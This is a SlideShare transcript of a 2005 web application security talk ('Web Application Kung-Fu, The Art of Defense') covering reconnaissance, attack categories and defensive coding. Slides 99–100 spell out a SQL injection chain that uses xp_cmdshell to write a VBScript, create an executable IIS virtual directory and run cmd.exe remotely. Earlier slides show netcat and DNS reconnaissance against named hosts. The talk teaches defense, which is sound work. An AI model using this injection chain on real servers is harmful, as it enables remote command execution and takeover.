Search

Web Application Kung-Fu, Art of Defense (Bellua/HITB)

Loading...

Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.

0 comments

Post a comment

    Post a comment
    Embed Video
    Edit your comment Cancel

    Notes on slide 1

    3 Favorites

    Web Application Kung-Fu, Art of Defense (Bellua/HITB) - Presentation Transcript

    1. Web Application Kung-Fu, The Art of Defense Shreeraj Shah Director, Net Square Bellua 2005 Jakarta, Indonesia
    2. Eye Opening Information • 95% companies were hacked from web applications and 5% of them were aware of them – FBI/CSI – 2002 • Most popular attacks are against web server – incident.org • 3 out of 4 web sites are vulnerable to attack (Gartner) • 75% hacks occurs at application level (Gartner) • Web application incident costs companies 320 Million USD in 2001 only (Gartner) • WHY??? © Shreeraj Shah
    3. Why ? – Web Application • Understanding evolutions • Infrastructure • Web Application • Complex application requirements • Integrated approach – Mobile app, Browser access, Intranet data share • Internet presence is most important • Application is open for all since it is the purpose behind the application launch. © Shreeraj Shah
    4. Background
    5. Infrastructure Evolution - 1 Internet router intranet www mail Database © Shreeraj Shah
    6. Infrastructure Evolution - 2 Other Offices Internet Exchange DMZ Dial-up router intranet VPN www mail Database RAS © Shreeraj Shah
    7. Infrastructure Evolution - 3 Other Offices Internet Exchange firewall DMZ Dial-up router intranet VPN www mail Database RAS © Shreeraj Shah
    8. Defense posture and Evolution Web Services Business Application Level Application Level Web/customized etc.. Services Level Traditional Attacks Brute force IIS web/SMTP/POP etc.. RPC buffer overflow Null session Etc.. Operating System Level ipc$/wu-ftpd/sunrpc etc.. © Shreeraj Shah
    9. Defense posture and Evolution Firewall VPN IDS Auth Server Etc… Web Services Business Application Level Application Level Web/customized etc.. Services Level X IIS web/SMTP/POP etc.. Traditional Attacks X Brute force RPC buffer overflow Operating System Level Null session X Etc.. ipc$/wu-ftpd/sunrpc etc.. © Shreeraj Shah
    10. Defense posture and Evolution Firewall VPN IDS Auth Server Web Services Etc… Business Application Level Application Level Next Generation Web/customized etc.. Attacks SQL injection Parameter tempering Services Level Etc.. X IIS web/SMTP/POP etc.. Brute force X RPC buffer overflow Null session Operating System Level X Etc.. ipc$/wu-ftpd/sunrpc etc.. Added Defense Accounts/Shares/Patches/updates/Logging/Auditing/ Ports/Registries etc… © Shreeraj Shah
    11. Defense posture and Evolution Application Layer Content Filtering Firewall Web Services Business Application Level Application Level Web/customized etc.. Last Generation X Attacks SQL injection Parameter tempering Services Level X Etc.. IIS web/SMTP/POP etc.. Brute force RPC buffer overflow X Operating System Level Null session X Etc.. ipc$/wu-ftpd/sunrpc etc.. Firewall Added Defense Accounts/Shares/Patches/updates/Logging/Auditing/ Ports/Registries etc… © Shreeraj Shah
    12. Defense posture and Evolution Application Layer Firewall Web Services Business Application Level Web Services Attacks Application Level Web/customized etc.. Last Generation X Attacks SQL injection Parameter tempering Services Level X Etc.. IIS web/SMTP/POP etc.. Brute force RPC buffer overflow X Operating System Level Null session X Etc.. ipc$/wu-ftpd/sunrpc etc.. Firewall Added Defense Accounts/Shares/Patches/updates/Logging/Auditing/ Ports/Registries etc… © Shreeraj Shah
    13. Evolution of Web applications Internet DMZ Scripted Web Web Web Server Engine Client Static pages only Dynamic pages ASP HTML,HTM etc.. DHTML,PHP,CGI Etc.. DB Internal/Corporate © Shreeraj Shah
    14. Evolution of Web applications Internet DMZ Trusted Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages only Dynamic pages ASP Coldfusion HTML,HTM etc.. DHTML,PHP,CGI Etc.. Etc.. X DB Internal/Corporate © Shreeraj Shah
    15. Evolution of Web applications Internet DMZ Trusted Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB Internal/Corporate © Shreeraj Shah
    16. Evolution of Web applications Internet DMZ Trusted Application Scripted Web Servers Web Web Server And Engine Client Static pages Dynamic pages Integrated HTML,HTM etc.. ASP DHTML, Framework PHP,CGI Etc.. ASP.NET with X .Net J2EE App Server Web Services Etc.. DB Internal/Corporate © Shreeraj Shah
    17. Evolution of Web applications Internet DMZ Trusted SOAP Web Service W Client E Application Scripted B Web Servers Web S Server And Engine E Static pages Dynamic pages Web Integrated R HTML,HTM etc.. ASP DHTML, V Client Framework PHP,CGI Etc.. I ASP.NET with C X .Net E J2EE App S Server Web Services Etc.. DB Internal/Corporate © Shreeraj Shah
    18. Application Analysis Framework • Black Box Method: Analyzing application with an attacker’s perspective. Seeing the web resources available to common user – like just to see 80 and 443. • White Box Method: Analyzing application with full knowledge and access. Access to deployment setup, Source code and other resources which are on the box. © Shreeraj Shah
    19. Kung Fu begins
    20. Methodology Footprinting Discovery Profiling Manual Attacks Auto Attacks Exploit Defense © Shreeraj Shah
    21. Footprinting
    22. Objective • IP and Port as start point for assessment – myth • What if IP is multi hosted? • Will it respond without HOST: in HTTP tag? • One IP can have more application to assess • Objective of footprinting is to find all possible combinations of hosts on IP. • How? © Shreeraj Shah
    23. Example of multihost • HTTPD conf of Apache <VirtualHost *:80> # ServerAdmin webmaster@dummy-host.example.com DocumentRoot /usr/local/apache2/htdocs # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-access_log common </VirtualHost> <VirtualHost *:80> # ServerAdmin webmaster@dummy-host.example.com DocumentRoot /usr/local/apache2/htdocs/blue ServerName www.blue.com # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-access_log common </VirtualHost> <VirtualHost *:80> # ServerAdmin webmaster@dummy-host.example.com DocumentRoot /usr/local/apache2/htdocs/red ServerName www.red.com # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-access_log common </VirtualHost> © Shreeraj Shah
    24. Example of multihost • Default Access C:Documents and SettingsAdministrator> nc 203.88.128.10 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Tue, 11 Jan 2005 20:17:40 GMT Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4 Content-Location: index.html.en Vary: negotiate,accept-language,accept-charset TCN: choice Last-Modified: Fri, 04 May 2001 00:01:18 GMT ETag: "1c4d0-5b0-40446f80;1c4e6-961-8562af00" Accept-Ranges: bytes Content-Length: 1456 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en Expires: Tue, 11 Jan 2005 20:17:40 GMT © Shreeraj Shah
    25. Example of multihost • www.blue.com C:Documents and SettingsAdministrator> nc 203.88.128.10 80 HEAD / HTTP/1.0 Host: www.blue.com HTTP/1.1 200 OK Date: Tue, 11 Jan 2005 20:17:45 GMT Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4 Last-Modified: Tue, 04 Jan 2005 23:10:29 GMT ETag: "1865-b-f991a340" Accept-Ranges: bytes Content-Length: 11 Connection: close Content-Type: text/html; charset=ISO-8859-1 © Shreeraj Shah
    26. Example of multihost • www.red.com C:Documents and SettingsAdministrator> nc 203.88.128.10 80 HEAD / HTTP/1.0 Host: www.red.com HTTP/1.1 200 OK Date: Tue, 11 Jan 2005 20:17:57 GMT Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4 Last-Modified: Tue, 04 Jan 2005 23:16:57 GMT ETag: "1cc0b-9-10b20c40" Accept-Ranges: bytes Content-Length: 9 Connection: close Content-Type: text/html; charset=ISO-8859-1 © Shreeraj Shah
    27. How to find hosts? • Whois – can help in determining name server • Look for PTR records if available. • If not bad luck! • There are few whois services out there can help in digging database and fetch what you are looking for – Key • Let’s see! © Shreeraj Shah
    28. Whois C:Program FilesGnuWin32in>jwhois -h whois.arin.net 203.88.128.10 [Querying whois.arin.net] [whois.arin.net] OrgName: XYZ corp OrgID: XYZC Address: 101 First Avenue City: NYC StateProv: NY PostalCode: 94089 Country: US NetRange: 203.88.128.0 – 203.88.128.255 CIDR: 203.88.128.0/20 NetName: XYZC-4 NetHandle: NET-203-88-128-0-1 Parent: NET-203-0-0-0-0 NetType: Direct Allocation NameServer: ns1.xyz.com NameServer: ns2.xyz.com Comment: RegDate: 2003-07-17 Updated: 2003-07-17 OrgTechHandle: NA098-ARIN OrgTechName: Netblock Admin OrgTechPhone: +1-212-999-9999 OrgTechEmail: netblockadmin@xyz.com # ARIN WHOIS database, last updated 2005-01-10 19:10 # Enter ? for additional hints on searching ARIN's WHOIS database. C:Program FilesGnuWin32in> © Shreeraj Shah
    29. Query PTR on name server C:Documents and SettingsAdministrator>nslookup Default Server: ns1.icenet.net Address: 203.88.128.7 > server ns1.xyz.com Default Server: [203.88.128.250] Address: 203.88.128.250 > 203.88.128.10 Server: [203.88.128.250] Address: 203.88.128.250 Name: www.blue.com Bingo! Address: 192.168.7.50 > set type=PTR > 203.88.128.10 Server: [203.88.128.250] Address: 203.88.128.250 10.128.88.203.in-addr.arpa name = www.blue.com 10.128.88.203.in-addr.arpa name = www.red.com > © Shreeraj Shah
    30. What if PTR is not there? • I know it sucks! C:Documents and SettingsAdministrator>nslookup Default Server: ns1.icenet.net Address: 203.88.128.7 > server 203.88.128.250 Default Server: icedns1.icenet.net Address: 203.88.128.250 > 203.88.128.11 Server: icedns1.icenet.net Address: 203.88.128.250 Name: ice.128.client11.icenet.net Address: 203.88.128.11 > set type=PTR > 203.88.128.11 Server: icedns1.icenet.net Address: 203.88.128.250 Non-authoritative answer: 11.128.88.203.in-addr.arpa name = ice.128.client11.icenet.net > 203.88.128.11 Server: icedns1.icenet.net Address: 203.88.128.250 Non-authoritative answer: 11.128.88.203.in-addr.arpa name = ice.128.client11.icenet.net © Shreeraj Shah
    31. Digging whois services • Some special whois provides following info http://whois.webhosting.info/IP Bingo! © Shreeraj Shah
    32. Got it! • We got all possible hosts on any single IP • Now assessment is possible using “Host:” • We can assess all applications and server will serve right info on both HTTP/1.0 and HTTP/1.1 © Shreeraj Shah
    33. Discovery
    34. Objective • Objective is to find live hosts which serves other than default content. • So one can list all live applications on single IP • HEAD/GET can help in doing so. © Shreeraj Shah
    35. Discovering applications C:Documents and SettingsAdministrator>nc 203.88.128.11 80 HEAD / HTTP/1.0 HTTP/1.1 404 Object Not Found Server: Microsoft-IIS/4.0 Date: Thu, 27 Jan 2005 10:12:16 GMT Content-Type: text/html Content-Length: 102 <html><head><title>Error</title></head><body>The system cannot find the file spe cified. </body></html> © Shreeraj Shah
    36. Discovering applications C:Documents and SettingsAdministrator>nc 203.88.128.11 80 HEAD / HTTP/1.0 Host: junk HTTP/1.1 404 Object Not Found Server: Microsoft-IIS/4.0 Date: Thu, 27 Jan 2005 10:14:37 GMT Content-Type: text/html Content-Length: 102 <html><head><title>Error</title></head><body>The system cannot find the file spe cified. </body></html> © Shreeraj Shah
    37. Discovering applications C:Documents and SettingsAdministrator>nc 203.88.128.11 80 HEAD / HTTP/1.0 Host: icenet.net HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Content-Location: http://icenet.net/index.htm Date: Tue, 11 Jan 2005 10:07:12 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Wed, 05 Jan 2005 06:52:02 GMT ETag: "0553fff3f2c41:b3ae6" Content-Length: 33442 © Shreeraj Shah
    38. Discovering applications C:Documents and SettingsAdministrator>nc 203.88.128.11 80 HEAD / HTTP/1.0 Host: adanigroup.com HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Content-Location: http://adanigroup.com/index.htm Date: Tue, 11 Jan 2005 10:07:24 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Wed, 28 Apr 2004 14:51:55 GMT ETag: "80771d59302dc41:b3ae6" Content-Length: 806 © Shreeraj Shah
    39. Discovering applications C:Documents and SettingsAdministrator>nc 203.88.128.11 80 HEAD / HTTP/1.0 Host: www.mundraport.com HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Content-Location: http://www.mundraport.com/index.htm Date: Tue, 11 Jan 2005 10:09:56 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Thu, 01 Jul 2004 05:59:09 GMT ETag: "80f45486305fc41:b3ae6" Content-Length: 607 © Shreeraj Shah
    40. Discovery • Got all possible live hosts now. • We have combination of IP, port and host. • Above three can help in getting right information out. • Application review is possible and scope would be complete for any specified IP address. © Shreeraj Shah
    41. Demo Application • Windows 2000 running IIS • DVD web store • Consumer application • Part of web application dealing with business model. Access to dealer network and such. DEMO © Shreeraj Shah
    42. Profiling
    43. Profile • Profiling web application is very important task to identify possible attacks. • Objective is to find from where we get cookie?, where are the forms?, It has applet or objects?, Querystrings are around or not? And such. • Regex can be used on HTML code to fetch these info. • Let’s see demo & method. DEMO © Shreeraj Shah
    44. Web Application Profile URL (Asset) Form Cmnt Email Applet Object Cookie Auth. Path Script QryStr X X / /cart.asp X /include/styles.css X /privacy.asp X /catalog.asp /aboutus.asp X X /details.asp?id=1 X X /details.asp?id=2 X X /details.asp?id=3 /rebates.asp X X /catalog.asp?start=3 X X /rebates.asp?loc=beckham.html X X /rebates.asp?loc=zhivago.html X X X X /orderapp/default.asp?login=yes X /orderapp/include/styles.css X X /rebates.asp?loc=monsoon.html X /details.asp?id=4 X X X /rebates.asp?loc=lawrence.html /details.asp?id=5 X X X /details.asp?id=6 X X /catalog.asp?start=6 X © Shreeraj Shah
    45. Web Application Assets • Each identified attribute can have vulnerability. • Vulnerability can be exploited by hacker. • Forms and Query string are major source of exploitation. • Other parameters like cookie, scripts (client side java, vb etc.) and path info (include, cgi- bin, servlet etc.) expose business level information. © Shreeraj Shah
    46. Impact Trail across the Model (Form and Query String)
    47. Impact Trail – Form / Query String Internet DMZ Trusted Client side processing Parameter Variable Processing Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Query Beans Processing Etc.. DB Internal/Corporate © Shreeraj Shah
    48. Impact Trail – Form / Query String c: ools>nc <HOST> 80 Internet DMZ Trusted GET /account.asp?id=5 HTTP/1.0 … … Client side processing Parameter Variable Processing Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Query Beans Processing Etc.. DB Internal/Corporate © Shreeraj Shah
    49. Impact Trail – Form / Query String c: ools>nc <HOST> 80 Internet DMZ Trusted POST /account.asp HTTP/1.0 … … Client side Id=5&customer=6 processing Parameter Variable Processing Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Query Beans Processing Etc.. DB Internal/Corporate © Shreeraj Shah
    50. Impact Trail across the Model (Comment and Email)
    51. Impact Trail – Comments / Email Internet DMZ Trusted Information Usage Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB Internal/Corporate © Shreeraj Shah
    52. Impact Trail – Comments / Email ….. <a HREF=“mailto:admin@example.com>... Internet DMZ Trusted …. < - - code in db,inc changed 12/12/2002 by John -!> …. Information Usage Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB Internal/Corporate © Shreeraj Shah
    53. Impact Trail across the Model (Applet and Object)
    54. Impact Trail – Applet / Object Internet DMZ Trusted Client Side Processing Data Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB Internal/Corporate © Shreeraj Shah
    55. Impact Trail – Applet / Object ….. <applet codebase=./code/> … </applet> Internet DMZ Trusted …. <object classid= 5672….></object> Client Side Processing Data Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB Internal/Corporate © Shreeraj Shah
    56. Impact Trail across the Model (Cookie and Authentication)
    57. Impact Trail – Cookie Internet DMZ Trusted Session Client Side Session Decision Session usage Management Session Cookie Application Cookie Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB Transport Layer State Internal/Corporate © Shreeraj Shah
    58. Impact Trail – Cookie HTTP/1.x 200 OK …. Internet Set-Cookie: DMZ Trusted ASPSESSIONIDCSSBBRQR=MKELONCBPANNHEKHCFGABJGB; CID=1 Session Client Side Session Decision Session usage Management Session Cookie Application Cookie Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB Transport Layer State Internal/Corporate © Shreeraj Shah
    59. Impact Trail – Authentication Internet DMZ Trusted Client side Control ACL ACL based Processing Decisions Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Data Access Beans based on ACL Etc.. DB Internal/Corporate © Shreeraj Shah
    60. Impact Trail – Authentication Form based (user/pass) Internet DMZ Trusted NTLM/BASIC/DIGEST etc… Client side Control ACL ACL based Processing Decisions Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Data Access Beans based on ACL Etc.. DB Internal/Corporate © Shreeraj Shah
    61. Profile Observations Logic Form Cmnt Email Applet Object Cookie Auth. Path Script QryStr Presentation X X X X X X X X X X X X Business X X X X X X Data Access © Shreeraj Shah
    62. Attacks & Art of Defense
    63. Profiling Attacks URL (Asset) Form Cmnt Email Applet Object Cookie Auth. Path Script QryStr X X Input Validation X Authorization X X X X X Parameter Tempering X Authentication X X Brute Forcing X X X Session Management X X X SQL Manipulation X X File Operations X X X Information Leakage Error/Exception management X X X X X X Client Side Manipulation X X X Java Decompile Cryptography X X Buffer Overflows X X X X Remote Command Execution © Shreeraj Shah
    64. Asset to Attack Mapping URL (Asset) Form Cmnt Email Applet Object Cookie Auth. Path Script QryStr X X Input Validation X Authorization X X X X X Parameter Tempering X Authentication X X Brute Forcing X X X Session Management X X X SQL Manipulation X X File Operations X X X Information Leakage Error/Exception management X X X X X X Client Side Manipulation X X X Java Decompile Cryptography X X Buffer Overflows X X X X Remote Command Execution © Shreeraj Shah
    65. Input Validation Authorization Parameter Tempering
    66. Severity and Damages • Access to internal information. • Unauthorized access to the content. • Unnecessary character injections to application layer. • Forcing application errors. • Bypassing ACL rules. • Breaking flow of application and logic. © Shreeraj Shah
    67. Input Validation Attack Points Internet DMZ Trusted Input Validation Forms Query String Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB DEMO Internal/Corporate © Shreeraj Shah
    68. Authorization Attack Points Internet DMZ Trusted Authorization Forms Query String Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB DEMO Internal/Corporate © Shreeraj Shah
    69. Parameter Tempering Attack Points Internet DMZ Trusted Parameter Forms Tempering Query String Cookies Scripts (client) Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB DEMO Internal/Corporate © Shreeraj Shah
    70. Defense Strategies Internet DMZ Trusted Application Tight variable level ACL to Control Filter for input characters combat To combat Authorization parameter tempering Filter 1 Filter 2 Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer Filter 3 X Components COM Beans Etc.. DB Internal/Corporate © Shreeraj Shah
    71. Art of Defense • Filtering content using secure routine (regex or other logic) • ISAPI level defense to application using URLScan or other tools. • Tight ACL on application layer. • Secure code review and analyzing variable trail. – impact analysis • Black box testing before deployment. © Shreeraj Shah
    72. Asset to Attack Mapping URL (Asset) Form Cmnt Email Applet Object Cookie Auth. Path Script QryStr X X Input Validation X Authorization X X X X X Parameter Tempering X Authentication X X Brute Forcing X X X X Session Management X X X SQL Manipulation X X File Operations X X X Information Leakage Error/Exception management X X X X X X Client Side Manipulation X X X Java Decompile Cryptography X X Buffer Overflows X X X X Remote Command Execution © Shreeraj Shah
    73. Authentication Brute Force Session Management
    74. Severity and Damages • Unauthenticated access to resources. • Application layer user/pass info. May lead to privilege escalation. • Session hijacking and spoofing. • Damage to critical information. • Database access. © Shreeraj Shah
    75. Authentication Attack Points Internet DMZ Trusted Authentication Forms Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB DEMO Internal/Corporate © Shreeraj Shah
    76. Brute Force Attack Points Internet DMZ Trusted Brute Force Attack Forms Auth. Page Cookie Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB DEMO Internal/Corporate © Shreeraj Shah
    77. Session Management Attack Points Internet DMZ Trusted Session Forms Management Query String Cookies Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB DEMO Internal/Corporate © Shreeraj Shah
    78. Defense Strategies Internet DMZ Trusted Tight session ID Lower use of Decision Based Secure Application On Session Tunnel Level cookies variables Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Application Etc.. layer Account Lock- DB Out Internal/Corporate © Shreeraj Shah
    79. Art of Defense • Secure channels • Strong Session ID (hard to guess and random in nature) • Usage of session variables and not on application layer cookies and such. • Application layer user/pass lock out. • Strong password policy. © Shreeraj Shah
    80. SQL Manipulation
    81. Severity and Damages • Direct database access • May manipulate or damage database • Depending role of application one can get root or admin level access on the system • Database enumeration and disclosure of critical information. © Shreeraj Shah
    82. SQL Manipulation Attack Points Internet DMZ Trusted SQL Forms Manipulation Query String Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB DEMO Internal/Corporate © Shreeraj Shah
    83. Defense Strategies Internet DMZ Trusted Application Secure Input layer filtering database Filtering access component Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer 1.Application X Components Role and COM access. Beans 2.Tighter Etc.. password 3.Usage of SPs DB Internal/Corporate © Shreeraj Shah
    84. Art of Defense • Web server level input filtering. • Application layer filtering • Tighter and secure data access component • Usage of database tools like stored procedure, parameterized query etc. • No direct “SELECT” statement from presentation logic. • Application role and restricted access. © Shreeraj Shah
    85. File Operation
    86. Severity and Damages • File access at system level • Read access out of web root • Write access on web root can lead to higher level of access. • Operating system level access. © Shreeraj Shah
    87. File Operation Attack Points Internet DMZ Trusted File Forms Operation Query String (Access to OS) Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB DEMO Internal/Corporate © Shreeraj Shah
    88. Defense Strategies Internet DMZ Trusted No write No read operation to file operation out of access web root. Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer Tight file access X Components object COM Beans Etc.. DB Internal/Corporate © Shreeraj Shah
    89. Art of Defense • Do not access and read file outer then web root. • Input filtering and blocking ../ etc. • No path usage or access to files. • Never write to file on web root or internal from web application. • Tighter file access object with defined permissions. © Shreeraj Shah
    90. Asset to Attack Mapping URL (Asset) Form Cmnt Email Applet Object Cookie Auth. Path Script QryStr X X Input Validation X Authorization X X X X X Parameter Tempering X Authentication X X Brute Forcing X X X Session Management X X X SQL Manipulation X X File Operations X X X Information Leakage Error/Exception management X X X X X X Client Side Manipulation X X X Java Decompile Cryptography X X Buffer Overflows X X X X Remote Command Execution © Shreeraj Shah
    91. Information Leakage Error Exception
    92. Error Exception Attack Points Internet DMZ Trusted Error Forms Exception Query String Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB DEMO Internal/Corporate © Shreeraj Shah
    93. Information Leakage Attack Points Internet DMZ Trusted Info Forms Leak Query String Path (include, log etc..) Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB Internal/Corporate © Shreeraj Shah
    94. Defense Strategies Internet DMZ Trusted Error text Tight error and Stack level control exception information handling. control Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB Internal/Corporate © Shreeraj Shah
    95. Art of Defense • Proper error handling. • Exception handling object. • Common logging and auditing • Out going string controls – Errors • Stack information control at all levels • Forceful error blocking by filtering • Internal variables like path, application info should not be part of error message. © Shreeraj Shah
    96. Exploit
    97. Remote Command Execution • It is myth one can not get admin/root access from application layer only • One way hacking • Command prompts on web • SQL executions from web • Privilege escalation • Owning system DEMO © Shreeraj Shah
    98. SQL injection • What if? • You don’t know web root • Firewall don’t allow outbound traffic • If you know web root – it is not providing write rights. • You know xp_cmdshell may or may not be working. DEMO © Shreeraj Shah
    99. SQL injection – Echo following lines to file • Set WshShell = WScript.CreateObject("WScript.Shell") • Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%") • windir = ObjExec.StdOut.ReadLine() • Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT") • Set Dir = Root.Create("IIsWebVirtualDir", "secret") • Dir.Path = windir • Dir.AccessExecute = True • Dir.SetInfo DEMO © Shreeraj Shah
    100. SQL injection – Echo following lines • http://target/details.asp?id=1;exec+master..x p_cmdshell+’echo ' Set WshShell = WScript.CreateObject("WScript.Shell") > c:secret.vbs’ Now run the vbscript http://target/details.asp?id=1;exec+master..xp _cmdshell+'cscript+c:secret.vbs’ Check - http://target/secret/system32/cmd.exe?+/c+s et DEMO © Shreeraj Shah
    101. Art of Defense by Secure Coding Code Reviews
    102. Defense strategies • Layers of validations. • Do not trust on inputs. • Source code review at presentation layer • Analyzing variables and input trails • Impact analysis with assumed inputs • Security functions - common for applications • Session management and cookie coding © Shreeraj Shah
    103. Defense strategies • No hard coded secrets • No plain secret in code, memory, config files or database • Common error object and powerful exception handling model • OS level exec call should be filtered • Message passing object from presentation to business logic should filtered © Shreeraj Shah
    104. Defense strategies • Array bounds checked • Max/Min controlled • File access path and decision should not be based on filename etc. © Shreeraj Shah
    105. Defense strategies • On .Net one can use IHttpModule interface • Validation up in the HTTP pipe • Only valid request goes in • Variables can be lock down © Shreeraj Shah
    106. Thanks! shreeraj@net-square.com http://www.net-square.com New Tool for web services http://www.net-square.com/wschess/

    + shreerajshreeraj, 3 years ago

    custom

    3332 views, 3 favs, 2 embeds more stats

    More info about this document

    © All Rights Reserved

    Go to text version

    • Total Views 3332
      • 3326 on SlideShare
      • 6 from embeds
    • Comments 0
    • Favorites 3
    • Downloads 0
    Most viewed embeds
    • 5 views on http://websecurity.com.ua
    • 1 views on http://192.168.10.100

    more

    All embeds
    • 5 views on http://websecurity.com.ua
    • 1 views on http://192.168.10.100

    less

    Flagged as inappropriate Flag as inappropriate
    Flag as inappropriate

    Select your reason for flagging this presentation as inappropriate. If needed, use the feedback form to let us know more details.

    Cancel
    File a copyright complaint
    Having problems? Go to our helpdesk?

    Categories

    Tags

    -->
    Search
    RSS Feed
    What's new?

    © 2009 SlideShare Inc. All Rights Reserved